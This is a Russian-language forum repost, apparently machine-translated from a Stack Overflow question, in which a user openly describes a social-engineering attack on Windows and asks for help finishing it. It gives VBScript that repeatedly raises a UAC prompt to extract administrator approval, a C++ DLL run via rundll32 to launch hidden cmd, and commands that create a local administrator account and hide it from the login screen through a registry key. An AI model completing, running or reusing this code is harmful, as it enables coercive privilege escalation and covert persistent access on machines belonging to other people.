Обход UAC Rundll32 не работает - Цифровое Кемерово

Обход UAC Rundll32 не работает ⇐ C++

1 сообщение • Страница 1 из 1

Anonymous

Цитата

Сообщение Anonymous » 26 янв 2025, 20:32

Я пытаюсь сделать что-то похожее (но более продвинутое) на то, что было продемонстрировано здесь:

TL;DW Это социальная инженерия атака. Я запускаю main.vbs, который постоянно рассылает спам-подсказку UAC, пока не будет введен пароль администратора. После получения прав администратора выполняются следующие команды:

Код: Выделить всё

net user defaultuser0 Pa$$wd /add
net localgroup administrators defaultuser0 /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v defaultuser0 /t REG_DWORD /d 0 /f
start /min

Это мой файл main.vbs:

Код: Выделить всё

Dim objFSO, objFile, strScriptPath, strCurrentDir

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(WScript.ScriptFullName)
strScriptPath = objFile.ParentFolder.Path
strCurrentDir = objFSO.GetAbsolutePathName(strScriptPath)

Set objShell = CreateObject("Shell.Application")
Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2")

objShell.ShellExecute "rundll32.exe", strCurrentDir & "\Repair.dll,Repair", "", "runas", 1
'Do
'   objShell.ShellExecute "rundll32.exe", strCurrentDir & "\Repair.dll,Repair", "", "runas", 1
'   Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='cmd.exe'")
'   For Each objProcess in colProcesses
'       Exit Do
'   Next
'Loop

(я сначала тестирую его без цикла)
Это код для ремонта.

Код: Выделить всё

#include 

__declspec( dllexport ) void CALLBACK Repair(
HWND hwnd,
HINSTANCE hinst,
LPSTR lpszCmdLine,
int nCmdShow);

void CALLBACK Repair(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
// Run the cmd minimized
ShellExecuteW(nullptr, L"open", L"cmd.exe", L"/min", nullptr, SW_HIDE);
}
< /code>
(пока я только пытаюсь запустить минимизированный cmd) < /p>
Я составляю его с: < /p>
g++ -shared -o Repair.dll .\Repair.cpp "-Wl,--subsystem,windows"

Проблема:
Когда я запускаю main.vbs и подтверждаю приглашение UAC, ничего не происходит .
Когда я запускаю Repair.dll вручную:

Код: Выделить всё

rundll32.exe Repair.dll,Repair

Я получаю сообщение об ошибке:

Отсутствует запись: исправить

Окружающая среда:
Я работаю в Windows 11 и компилирую это в VSCode с помощью компилятора Msys2 g++.Цель:
Запустить все вышеупомянутые команды скрыто (как фоновый процесс или что-то в этом роде), затем запустить свернутый cmd (который будет называться System -уровень).
Я не являюсь экспертом ни в Winapi, ни в работе с DLL, поэтому, пожалуйста, объясните, как мне этого добиться, какой формат мне следует использовать,...

Подробнее здесь: https://stackoverflow.com/questions/793 ... ot-running

1737912762

Anonymous

Я пытаюсь сделать что-то похожее (но более продвинутое) на то, что было продемонстрировано здесь:
[youtube]f6TVqLSYcxE[/youtube]
TL;DW Это социальная инженерия атака. Я запускаю main.vbs, который постоянно рассылает спам-подсказку UAC, пока не будет введен пароль администратора. После получения прав администратора выполняются следующие команды:
[code]net user defaultuser0 Pa$$wd /add
net localgroup administrators defaultuser0 /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v defaultuser0 /t REG_DWORD /d 0 /f
start /min
[/code]
Это мой файл main.vbs:
[code]Dim objFSO, objFile, strScriptPath, strCurrentDir

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(WScript.ScriptFullName)
strScriptPath = objFile.ParentFolder.Path
strCurrentDir = objFSO.GetAbsolutePathName(strScriptPath)

Set objShell = CreateObject("Shell.Application")
Set objWMIService = GetObject("winmgmts:\\.\root\CIMV2")

objShell.ShellExecute "rundll32.exe", strCurrentDir & "\Repair.dll,Repair", "", "runas", 1
'Do
'   objShell.ShellExecute "rundll32.exe", strCurrentDir & "\Repair.dll,Repair", "", "runas", 1
'   Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='cmd.exe'")
'   For Each objProcess in colProcesses
'       Exit Do
'   Next
'Loop
[/code]
(я сначала тестирую его без цикла)
Это код для ремонта.
[code]#include 

__declspec( dllexport ) void CALLBACK Repair(
HWND hwnd,
HINSTANCE hinst,
LPSTR lpszCmdLine,
int nCmdShow);

void CALLBACK Repair(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow) {
// Run the cmd minimized
ShellExecuteW(nullptr, L"open", L"cmd.exe", L"/min", nullptr, SW_HIDE);
}
< /code>
(пока я только пытаюсь запустить минимизированный cmd) < /p>
Я составляю его с: < /p>
g++ -shared -o Repair.dll .\Repair.cpp "-Wl,--subsystem,windows"
[/code]
[b]Проблема:[/b]
Когда я запускаю main.vbs и подтверждаю приглашение UAC, ничего не происходит .
Когда я запускаю Repair.dll вручную:
[code]rundll32.exe Repair.dll,Repair
[/code]
Я получаю сообщение об ошибке:

Отсутствует запись: исправить

[b]Окружающая среда:[/b]
Я работаю в Windows 11 и компилирую это в VSCode с помощью компилятора Msys2 g++.[b]Цель:[/b]
Запустить все вышеупомянутые команды скрыто (как фоновый процесс или что-то в этом роде), затем запустить свернутый cmd (который будет называться System -уровень).
Я не являюсь экспертом ни в Winapi, ни в работе с DLL, поэтому, пожалуйста, объясните, как мне этого добиться, какой формат мне следует использовать,...  

Подробнее здесь: [url]https://stackoverflow.com/questions/79388240/rundll32-uac-bypass-not-running[/url]